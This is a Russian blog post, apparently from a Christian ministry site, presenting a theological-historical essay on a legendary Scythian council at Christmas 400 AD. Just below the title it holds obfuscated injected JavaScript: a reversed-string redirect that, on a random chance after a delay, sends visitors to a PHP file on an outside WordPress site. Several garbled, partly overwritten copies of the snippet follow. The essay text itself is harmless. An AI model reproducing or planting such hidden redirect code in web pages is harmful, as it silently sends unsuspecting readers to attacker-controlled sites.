Иносказания

Последний совет скифов или Однажды под Рождество (2)


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

В канун Рождества 400-го года много чего важного и интересного могло произойти. Но вряд ли что-то может быть интересней, чем помещенный мною в этот год и в этот день Великий Совет скифов. Который мог тогда состояться, а мог и не состояться. Но, думаю, почитать о нем все же стоит.

Я вначале поговорю о том, что произошло, что состоялось в этот год, и в примыкающий к нему отрезок времени. И как собирательный образ, как притчу о том времени, о том важном, что тогда происходило, я расскажу вам Легенду о Последнем Великом Совете Скифов – который, как я уже сказал, мог состояться, а мог и не состояться в канун Рождества 400-го года.

Почему Рождество? Да к тому же круглого года? Конца столетия? Почему такая круглая дата? Опять-таки, для удобства рассказа. Я сам являюсь последним доктором богословия двадцатого века, даже можно сказать второго тысячелетия – мой диплом, подтверждающий присвоение мне степени доктора богословия, который выдан университетом Андрюса, подписан и датирован 31 декабря 2000-го года. И я примечаю особо круглые даты. Наверное, Господь тоже понимал, что люди, такие ограниченные как я, к примеру, будут придавать значение круглым датам. И как великий Учитель Он действительно мог заложить в круглые или особенные (пророческие) даты что-то важное, на что стоит обратить внимание.

Так вот, в году 400-ом, в канун Рождества, или в какой другой день, могла состояться такая вот встреча братьев, о которой я вам напишу. А могла и не состояться. Но состоялась она или нет – это не так важно. Важно то, что именно в эту пору лицо Европы начинает стремительно меняться. И меняться именно в том направлении, хорошем ли, или плохом, о котором мы узнаем из произошедшего на Совете Скифов, о котором вам расскажут историк, богослов и писатель. Но к этому Совету читателя надо еще приготовить. Вот этим я сейчас и займусь. Начну я рассказывать вам понемногу о том, что предшествовало этому Совету. Держитесь покрепче за меня, вашего гида, чтобы вам не потеряться.

Кстати, больше информации по истории Руси, и не только об этом вы можете найти из моих видео на YouTube канале «Открытая семинария».

Но куда отправимся мы? Туда, где собрались тогда братья, скифские князья, в последний раз. А где они собрались? Они, конечно, могли собраться где угодно – вся земля была перед ними, вся великая земля Скифов, бескрайняя земля скифов, земля славян.

Не огнём и не мечом досталась скифам эта территория. Они просто выросли на ней, в нее и среди нее, они скитались и оседали на ней уже многие столетия, и встречали на земле мирных людей, с которыми они и роднились. Они были когда-то язычниками, как и те народы, племена, и просто семьи, что встречались им тут и там на бескрайних просторах Евразии. Все эти люди то оседали на земле, то снова пускались в путь, движимые разными ветрами, которые и пытаются объяснить по-разному разные историки.

Но мне кажется – говорю субъективно, из своего опыта и наблюдений – что людей, особенно некоторых, просто естественным образом уносит ветер странствий. И это не обязательно должен быть какой-то исторический ураган. Чтобы привести народные массы в движение не нужны сильные ветра. Достаточно легкого паруса, любопытства, ну и небольшого попутного ветерка, чтобы иногда целые массы народов срывались с места.

И об одном из таких «сорванных», о скифском князе и римском генерале Хейна я поговорю с вами. Это – историческая фигура, о которой не так много написано. Да и я напишу о нем кратко. А начну – с художественного вымысла, с семьи Хейне (о которой нам по правде ничего не известно). Но иногда жизнь человека так отражает его семью, что диву даешься. Думаю, было это и в случае с Хейне.

По сути я делюсь достаточно сырым материалом – то в форме Легенды, то собрания исторических фактов. Начал я писать эти очерки в ночь под Рождество, когда я подарил себе несколько роскошных часов, которые с наслаждением потратил на написание Скифского Рождества. Потом уже такой роскоши, многих часов в цепочку не было, и писать приходилось урывками, поэтому и стили рваные. Но все же мне кажется очень и очень интересным прослеживать историческую картину, исторический сюжет – пусть и в форме притчи – в которых наш недостаток ведения истории дополняется библейскими пророчествами. А именно это я и делаю.

Как богослов я говорил и повторю вновь, что Ветхий Завет не имеет четкого различия между Первым и Вторым приходами Мессии, Иисуса Христа. Поэтому в основном весь комплекс событий, сопряженных с Днем Господним, проигрывается в той или иной степени в обоих сценариях. Но об этом вы можете почитать в других сериях моих статей.

Так вот, эти мои очерки, на сегодня по крайней мере – представляют из себя богословско-историческо-художественное произведение. Перельется ли оно со временем полноценно в один сосуд, или останется разлитым по сосудам разным – не знаю. Но с другой стороны я нахожу даже эти первые плоды – интересными и вкусными. Да, может это и сыроедение. Говорят, это очень полезно. Не уходите далеко, друзья. Впереди – множество интереснейших открытий в нашей с вами истории.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

***

Поддержать служение

«Солёного радио», — сайт, YouTube канал, архив Яндекс Диска, — можно перечислив любую сумму на карту Сбер 4276 6600 1073 3772 (Дмитрий Александрович Б.). В сообщении можно написать просто «СР».

***

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Международный Телеграмм чат «Возвращение домой — общение православных и протестантов

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.